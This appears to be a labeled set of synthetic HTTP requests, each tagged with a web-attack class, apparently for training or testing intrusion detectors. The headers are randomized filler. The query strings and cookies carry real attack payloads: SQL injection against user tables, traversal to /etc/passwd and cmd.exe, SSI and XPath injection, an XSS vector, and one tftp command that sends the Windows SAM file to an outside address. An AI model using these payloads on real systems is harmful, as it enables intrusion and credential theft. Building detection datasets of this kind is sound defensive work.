Pragma: Abe9re4='w'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: NTLM bzlTcm52eXZvZ2FlaWxmSHdhb2N5c2llbnQ0TGkzUnQ=
Range: 40517-,9-9675
Referer: /daa6n.cfm
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: izaaa4/9.8.5
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/4.6 www.Euuyn.tiff, hgtot5/2.0 31.213.183.2, agmfan/5.2 136.43.101.187
Transfer-Encoding: deflate
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43876
Start - Id: 35984
class: PathTransversal
PUT /FJkPqI/s5/cJsgKIF@@ImL/HesIdlsuadaimtuilia/qssa8nEy3seyevrBY/2pTRusmhwosiM/0romrgeidn2iho/n8tx5/e9.U@us7AEJsaK/imgTB3b/nplRnRCwH_.bin? HTTP/1.1
Content-Length: 146
Content-Language: trtehj,0f,mYy
Content-Encoding: compress
Content-Location: http://www.aiaZi3tc.be/9slvls/nIfI/zaChba7.php3
Content-MD5: aW9lYnQyYWk3c2VvbFJpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 May 09 14:46:27 UTC
Last-Modified: Thu, 03 May 07 19:41:11 UTC
Host: www.ufikmsxIua.it
Connection: t4fnmos
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: a-ouvOharh;q=0.3, sou-aet;q=0.8, 0sgoDae-9Ene, iumi-nidoob
Cache-Control: no-store
Client-ip: 110.8.182.127
Cookie2: $Version="01"
Date: Fri, 03 Aug 07 14:07:24 CET
ETag: "mF.PGpo8XgOKlZ_"
Expect: 100-continue
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Mon, 27 Sep 04 07:06:34 GMT
If-None-Match: *
If-Range: Thu, 03 Dec 09 16:53:05 GMT
Max-Forwards: 7935
Pragma: no-cache
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Referer: /cTiy.mp3
User-Agent: ko9teZn9bn
X-Forwarded-For: 59.156.7.223

r1lohi8dnoie4iu=..........................WINNTsystem.ini&suufpeiultemads=elr&ene0fr=<&g1eeEsbe=8&S0f=edtnph-iechohdopenj?Acmte (us&k7AxxS=j

End - Id: 35984
Start - Id: 41450
class: SqlInjection
PUT /uNlA03ghX.ZWRPXZ2EDB/tLtxHU3UzbzE7@Llm/sgnm.jpg? HTTP/1.0
Content-Length: 322
Content-Language: AwmmgHpg,AH7de4s
Content-Encoding: identity
Content-Location: /fnzvali/seSspz/rqsjc9/kcatwwd/d0ro.png
Content-MD5: M2VubmFtaTFPc2VlQWhvaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 03:38:49 CET
Last-Modified: Thu, 27 Nov 08 15:31:21 GMT
Host: 241.152.185.129
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: Nk5teqe5-i8dotuu, sikEorsw-tgsar2tA;q=0.7, h-7
Cache-Control: min-fresh=6
Client-ip: 87.117.104.122
Cookie: eoea6e=740
Cookie2: $Version="9"
Date: Fri, 13 Apr 07 05:09:47 GMT
ETag: W/"0T-9MndUn8_eYiCf9G8s"
Expect: ysrandij=meot
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 20 Dec 08 24:10:57 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: *
If-None-Match: "QfP-JhQ.v17vLKhsSh_"
If-Range: "dfAkBc5BPKkPXjMlYg"
Max-Forwards: 4
MIME-Version: 9.4
Pragma: nren='eyd'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest qop=auth
Range: 863-,45-,1-
Referer: http://www.tfbu86c.cz/uedoce/aiyer/aacmnltr/iaVtoj.pdf
TE: deflate;q=0.2
Trailer: Via
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 9.5; ia-tt; rv:6.1.9) Gecko/37917580
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: FTP/6.3 150.32.136.124, 8.1 246.108.127.72
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 307 www.aiPaisn.jpeg:7090 "ttaoiIpDdouernxa" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ARHdmneeia=dtoo&61%ul9d=4114486&lmtwrnqote=1939316069&d6ihdnl=04312&caxe=570073272&oisnt=chairs%27++UN%2F**%2FION++++SEL%2F**%2FECT++neCay+++FROM+++++dba_users++++WHERE+lyh+++++like++%27%2525&nsYwoep=ner%25s+4emoi%5Dr&Ttqsc=b+7c%3Ct0a0atfsmezpassthrue+&iiz7x=35&WF.-b_=repcrranR&erAylhf5ttsenn=2016692&iisCtiuiriennaz=tNto

End - Id: 41450
Start - Id: 41787
class: SqlInjection
GET /hn2dnqo.gif?ses=pwb&a6fbttgxnix=a+htacces%40ascriptnmehttpma+t+ac&dEW4=13&oabsoeOs=%27%29+++UNION+ALL+SELECT++806++++FROM+++eeiymeet++WHERE++++%28++++%27%27++%3D++++%27&toinahae=mf18j&j8eaemorSq=7&lRWZh7RRI=0325727&hfbhobes6wn=ojtyl8casdh&P8fs9R9Gt=74137611&fXhT9WXU.=hBCZ3 HTTP/1.0
Host: 223.227.61.152:74
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: c-ocntpea;q=0.7, psqtaqe-efekTo, sT-net;q=0.2, t3irmefe-lirhrtR;q=0.8
Cache-Control: max-stale
Client-ip: 28.101.148.145
Cookie: ipkRRstyle-OTlw=uoXYwj;ifl7itsw=56;wn6imierouwNna=6
Cookie2: $Version="3"
Date: Thu, 08 Jan 09 04:34:31 CET
ETag: ".4g273Gu0e1YegQr"
Expect: e813nRi=Rjetwieo;hsuvez=0ens
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:18:55 GMT
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: *
If-Range: Wed, 25 May 05 13:40:47 GMT
Max-Forwards: 1
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: 1drue cinwmP=lveSh
Range: -47,-6912
Referer: /6dtoms.sh
TE: gzip,trailers,deflate;q=0.4
Trailer: Upgrade
User-Agent: dyAjmDBag http://www.rotapn.ch
UA-CPU: x86
UA-Disp: 4110,3651,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: yswa/6.4
Warning: 328 www.aeePtha.gif "090pevlaxa3e8csta7a" "Fri, 15 Sep 06 14:42:50 UTC"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41787
Start - Id: 44630
class: OsCommanding
POST /ceaeU/Xrx58ustyleTt.l/0r/tV@/eTTeRJ9oRN@l3s6j@/oL/lfqkYrfx/msNThlcpQM_Y0tgA8/Gtskirrh97i5y/iY/.3/jRkAyQZOvLIck.gif? HTTP/1.0
Content-Length: 104
Content-Language: a
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Host: www.apApeiknyn.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: fngn9um=ddun
Cookie: tupfa=txtN3vteLbyensIfc;atsr=nncrrnakm2;ooh=awmqIUP0rAef;eo4=41394803;n6=eaegefahtmhct;Nhipse=219.109.221.48    |tftp     -i    69.71.163.253     PUT sam._
Cookie2: $Version="190"
Date: Fri, 11 Jan 08 22:28:27 CET
If-Modified-Since: Wed, 10 Jun 09 02:59:20 UTC
Authorization: NTLM bmVvYW5lczh0cndlQm1hNHhlcmRzcmVyZW5pbndiUzByRGk=
Referer: http://www.m9nv.ch/k979z/sdonrn/txain/3cegifu8/4osbE.jpeg
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 7.7; 6i-8g; rv:9.8.0) Gecko/01161812

e1mk43V=pr7&dy=crepaem&oihoh=1670&siteuinrl2h=rvG@ocb&C3ohrsIf=0o2tuqmo2satntd;&iiuoqnckcrl=jdYlN-U2

End - Id: 44630
Start - Id: 49826
class: XPathInjection
GET /tdMJ1/e7indtloiLotgyim5/RBK-KFautoexec/4mxrh3oohhtepes/dTtnio9etemEhg.asmx?ntrt4dszp2a=1KpawR-k&RMeIPdropmHqoNK=s_1rPtm&nLthf1ERuosoieo=fPxj&kL7replacefQD=6+++++or+++++iweho%2Fet%2Fpben86%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D++or++28175%3D&tlaseNplctr=ini&9wadbifmt4eatA=27687940&twslhfw=a&QsGtel=52942&sieei=itdof9&teiae=iNpe3Zj&irvkd9Li=L9elreEaealadacfh HTTP/1.1
Host: 118.48.243.194
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: 
Accept-Language: lpuoWEl-vtz, x0hedMrr-i;q=0.4
Cache-Control: max-age=280
Client-ip: 113.253.116.24
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Thu, 16 Jun 05 10:26:39 UTC
ETag: W/"w.9GIbIX8mlsodZh"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 09 Sep 07 06:57:46 CET
If-Unmodified-Since: Fri, 08 Jan 10 12:21:32 CET
If-Match: "Z4mThy9stP_NqESWo"
If-None-Match: "oaGOmk42r0VfPgn5P9kZ"
If-Range: "Tk_7pMYt2ZAAxSR"
Max-Forwards: 8888
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: NTLM dG9obmRkc2h0b3Npc2VSdGN0c2Vicm5ndWFsZWVlYXNtZm1oc3NzcEU=
Range: 146069-77725,-1146
Referer: /fEleo/ncjdh/aDlln/htroor/eg8hr.cfm
TE: chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 9.1; ds-8y; rv:9.0.5) Gecko/53171850
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/3.6 80.202.75.241
Transfer-Encoding: coalqt; lpietfo=dipdwS
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49826
Start - Id: 39634
class: SSI
GET /ihjHEXi9Ol5@/Ry20dperlMParh/e7NlAsttEeoamx/AkFpkP-OvGep/gstylegyM3YoexeckJ5cR/9ngsu/i6wetnm/3hrqfvbscriptsz3Estdin/aTnlnHam6aefjlpvthg/O5Urtotozfdeuaeprt.html?caehalctt=42044621&elweerdi=%3C%21--+%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&jdR5S8vk-si=3007487&OwZiayandGYr=%3FialN&DNtastpsomn3=plMZLUIr&eAwr=execexec%3DsIosda&xThiCnLhnecchaC=8hk20Gy&dyneltx=88447&eei3solranS=nvUNRoDMj5&soioncneehitce=kandy%3ESrcpru8el+oon&mYopt@usrNtmpbinchild=ohygotCp3oIltne&1dr153es8clt55w=0031 HTTP/1.0
Host: www.f1rvks0tns.biz
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.0, shift_jis;q=0.0
Accept-Encoding: gzip
Accept-Language: a9travia-Ja;q=0.2, shoheteO-6e, c-1asmnl;q=0.7, x-uwozibaa, royzIo-tet8gc;q=0.4
Cache-Control: min-fresh=93458
Client-ip: 225.141.13.194
Cookie: fsba7bbprao1Eeg=ldelete;emegmSe0otbtoch=@9;0nt=7;5metapBuniontx-=execn
Cookie2: $Version="9"
Date: Sat, 01 Mar 08 15:36:13 UTC
ETag: "@Py@vCbgWDBllPns"
Expect: urn5i=nrpg
From: nneTpp@ds2o4khd.org
If-Modified-Since: Fri, 21 Mar 08 01:38:24 UTC
If-Unmodified-Since: Wed, 13 Jul 05 23:05:22 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: *
If-Range: "5lhYstAr7mTqXswsIh"
Max-Forwards: 375
MIME-Version: 1.8
Pragma: C='mfyfl'
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: NTLM dHloc3JDdGF0ZWlydGVvUlRzc3dieTBnZWh0ZWQzOXBrcg==
Range: -8469,086240-,65-225201
Referer: http://www.Irsmtnt.ch/ibErr.mp3
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/9.2 (compatible; 6eaPeGa; Open BSD i586; olcdo; ftgt0mel)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 3.3 www.4nva.shtml, aocias/0.5 208.21.81.107
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 49.36.83.109
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39634
Start - Id: 35215
class: SqlInjection
GET /h0/autoexecD8nullSNMjs/S2m/ASd@nshutdownpkincludef/mj/ow5us8natnuslttb/iP/nu3arqnKitS/eCm/wWu0XE2mR4gyfpStAhm/n8beknsc/OVOservicesr_tmp.A.cgi?7oito=9&islpetutu9Eo=select+arku+++++from+ALL_USERS&bec=ip6ige&NnhCE=4423337&8oxx9ihaae4dd=7D1IUpSt&dlhtEiTohhnee=r&f4exec00glsI=856979&OO4IMRhRrH=c%28Olinoafmo&uAhwt4ooRpqh=areiuesOjeltmlnei HTTP/1.1
Host: 205.120.254.77
Connection: ooNni
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: fUbua1me-solso9h;q=0.1, rlktsh-ndrs;q=0.7, a6s-t;q=0.5
Cache-Control: max-stale
Client-ip: 247.223.116.97
Cookie: havingF0MnodeotHSsxJ=792;2srwevg5oh1i=42627
Cookie2: $Version="29"
Date: Mon, 27 Jun 05 12:28:35 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: inoen@aqahlweho.fr
If-Modified-Since: Wed, 04 Nov 09 01:51:40 GMT
If-Unmodified-Since: Sun, 23 May 04 08:17:57 UTC
If-Match: "1grv9A-vF8zZuAutg9w7"
If-None-Match: *
If-Range: Sat, 26 Mar 05 06:52:38 GMT
Max-Forwards: 4
MIME-Version: 1.4
Pragma: thhet2=qe
Proxy-Authorization: eTi1ny Jxi3piru=smaxcs
Authorization: Basic R2J5NnRpbzp3bmVz
Range: -30216,36258-
Referer: /enyy/ltEie/8ebt/tfrcts4s/Bnl1aIlo.wmn
TE: deflate
Trailer: Accept-Language
User-Agent: rtpeDd/8.0.3
UA-CPU: StrongARM
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: eomton
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35215
Start - Id: 36335
class: PathTransversal
GET /eBP1P0dKpSEtSWs3wzIK/o7Bmn_2G/tW8oDSY.N4wo_iYA_b/idwinntT6hcB-b/divAYexecoptPMpJC/8Bybbgsound2QERoje/jSswXuJrsc9/lele/hf/8nullD48rmw5c.jpeg?F3NPFKCSk0=rdi9033t+&nHhenl=3062623&tTuy=mu&hd=UmedsTaieehttmnrce&Ehht=5ieodcu&hnwmiup=79065&9ITSECfeV_=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&dlcrelminga=rsrwsr3&Inmthtz=4fsao2trylref&XZYpZC=fehoEsetecow&ger=lI0&ttv4g6=urStb7iaiLtssfee&hoeroeoer6eeneE=11940&ta7=44292 HTTP/1.0
Host: www.y0cbryIg.com
Connection: l8suii
Accept: application/*, text/*;q=0.5
Accept-Charset: iso-2022-kr, x-mac-cyrillic;q=0.4, gb2312
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="3"
Date: Fri, 11 Nov 05 16:09:02 UTC
ETag: W/"vPrR@V7cv9OAFF.ubB"
Expect: 100-continue
From: imeua@eefaielgto.it
If-Modified-Since: Fri, 09 Feb 07 11:50:15 CET
If-Unmodified-Since: Tue, 11 Nov 08 16:18:31 GMT
If-Match: *
If-None-Match: *
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 4325
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM b2M1YzQ3c3dnTnluYXlicHJuOWxwZHNxYXNpSGVheWlKbmVPYWVoRTI=
Authorization: cspyr ousetzo=sno2
Range: 94941-674,-88804,1546-98301
Referer: /aNcise/Ibicpe.gif
TE: chunked;q=0.6
Trailer: User-Agent
User-Agent: hrNhtnoroEbaTaup
UA-CPU: PowerPC
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: eryte/3.8 www.iyrrP.css:5320, 9.3 109.182.26.199, FTP/2.4 www.9ts7.css
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 9001886715622
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36335
Start - Id: 36445
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 203.99.122.50:0221
Connection: w7fer7w
Accept: */*;q=0.9
Accept-Charset: iso-8859-9;q=0.0, x-mac-greek;q=0.0, windows-1253
Accept-Encoding: identity, identity;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 78.62.184.229
Cookie: plnihGa3d=4%[ey
Cookie2: $Version="10"
Date: Tue, 11 Dec 07 20:34:52 GMT
ETag: W/"QcQUC6TnA4cSdTY9asB"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Sun, 04 Jan 09 18:51:01 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9725
MIME-Version: 8.0
Pragma: c2fqred=Ddnj
Authorization: Digest response="dCb9D4d7cCe23F8b224438BD3a3Ee8E8"
Range: 336-,5495-71936
Referer: http://ctywut2.it/eSfDye/oafheUos.sh
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 9.7; ua-fz; rv:3.5.7) Gecko/57104397
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: FTP/6.0 109.251.5.132, FTP/1.9 124.107.204.229
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126
----: ---------------------------

null

End - Id: 36445
Start - Id: 45834
class: PathTransversal
GET /cyGP5KUi8/iirnurJBVb6S7@z/do/sslhDieu2te0/litecaxnsrpsopre/7a/ai3g.lA0nyJ@uR61iu/rgOpncpnuzsejfma.tiff?rtzetTmtfe=%24ereplaceptobjectKsystemis&thyreOrslehsdn=%5Cautoexec.bat&2sncypnaar0aaat=zeebodyometaphpeetctr%25ida%2F+teO&lh=Nnetr99ou%27ow&ktAeeas=+&afla=79578&si4n=+stdinefscript&riInnow=hRao&weqaYiitc=faaOariniiapw3inba&egtCudey=%3Exer%3EtUisinsert%3Bubhei%2Bti&amazdcoteodc5i=l&yKZn8yStE=e80%3ChiLMsnofg3formeUc&4twoa=%3F%7E%5Ch&tsetelsg1hvt=010726 HTTP/1.0
Host: www.ierheot0k.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, compress;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 56.249.214.170
Cookie: ml=59644;r4rf5ees=paai/
Cookie2: $Version="9"
Date: Thu, 05 Nov 09 23:11:37 GMT
ETag: "pcuOXffDgOU2k3R9Y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Fri, 27 Jun 08 09:24:40 UTC
If-Match: "ziEfDRGDlKnB.7Xb_W"
If-None-Match: *
If-Range: Sun, 04 Apr 10 13:33:34 CET
Max-Forwards: 9
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: -885841
Referer: /entf/qluOcw/dEee.css
TE: gzip;q=0.0,deflate;q=0.8,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.0 (compatible; Konqueror/4.2; Win 9x; uepiehd; nePtoege; e8sAuUo)
UA-CPU: StrongARM
UA-Disp: 7854,570,8
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: compress
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45834
Start - Id: 41936
class: SqlInjection
GET /Inlntaodcyotldielwh/Hlsn8alutyi.jpeg?MF0-6UWoccmdYJ=nfe&ysn1raats7=x1y3zSS&pn5yhoetO=anautoexec&elnaaassso=59684239&9cCec=51937049&ss7sdtstynuhs=nPETJk&Md1NwyRKS6QK=OR+++++405063%3D405063&lde=INcj%2B&alcsirn5t1ns=78132798&sdt7eOrTleea=j1qmG HTTP/1.0
Host: www.5coye.ch:9787
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.1, x-mac-ce, utf-8, iso-10646-ucs-2, iso-8859-5
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=5092
Client-ip: 148.203.206.38
Cookie: biar3=190503;xte5vtlsgSrsne=8
Cookie2: $Version="049"
Date: Tue, 13 Dec 05 07:57:19 GMT
ETag: "yqI8BVet6kNEav5Q"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 08 Jul 04 04:43:54 GMT
If-Unmodified-Since: Wed, 10 Dec 08 21:36:51 GMT
If-Match: "h1xAaJiYOZdWVdq"
If-None-Match: *
If-Range: Thu, 08 Jun 06 19:55:45 UTC
Max-Forwards: 0881
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: eluul setao=rr7y
Range: 230210-,74601-,-666
Referer: /ntrsko/rausi4/oos7p.css
TE: gzip;q=0.8,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (Windows; U; Win 9x 1.1; 3o-8i; rv:8.2.3) Gecko/50573339
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: compress
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41936
Start - Id: 47467
class: XSS
GET /yeb/Op2mail0EQWqq@0di5M/is_W/4Xry/1Ld9BzDcmd.tiff?isrmhf=atm%26dT+iedeehttp&Eel=7725&BbkFGdniV=5ete&bnsqigEearced=%3Cdiv+++++style+%3D%22++background-image%3A+++url%28javascript%3A++%5Balert%28%27Yeet%27%29%3B%5D%29%3B++++%22+%3E HTTP/1.1
Host: 18.179.164.154
Connection: keep-alive
Accept: audio/basic;q=0.5, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1, deflate;q=0.6, gzip;q=0.7
Accept-Language: oRg-ic;q=0.2
Cache-Control: no-cache
Client-ip: 146.143.28.253
Cookie: qAnebshlvae0ue=t6Q2P
Cookie2: $Version="37"
Date: Sat, 30 May 09 24:40:07 GMT
ETag: W/"VJv-h_R-xwNf4sdTcrI"
Expect: 100-continue
From: oou9@rIjx.it
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Sat, 08 Aug 09 13:59:09 CET
If-Match: "gL6YtxnaTEOBiKMPbbB"
If-None-Match: *
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 307-,052-4971
Referer: /eajd5sd/mphcOtns.swf
TE: deflate,deflate;q=0.8,gzip;q=0.8
Trailer: From
User-Agent: nyoe3 (y99Wqu; eWS0CUZ; 3i43YKcO4; n_zxR_Va.F)
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4671x382
Via: 9.5 214.176.0.28:6399, FTP/5.2 www.nsej.png:9, zaeuRq/9.2 www.pybkrou.htm
Transfer-Encoding: compress
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47467
Start - Id: 43859
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 138.161.27.254
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.9, compress;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="8"
Date: Wed, 18 Mar 09 12:13:39 UTC
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: "iKysEnX1om9AoSfLW9"
If-Range: Mon, 14 Feb 05 16:08:00 GMT
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Digest qop=tTfrtNsH
Range: 064373-124259,214-265,801-679
Referer: http://Dtl7bTAs.ch/Orner.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.5 (compatible; tadt; Unix; 5lRie; at42Ngze; icctds9)
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 623 www.ednk.css "ctoro1sddstfeDiliter" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

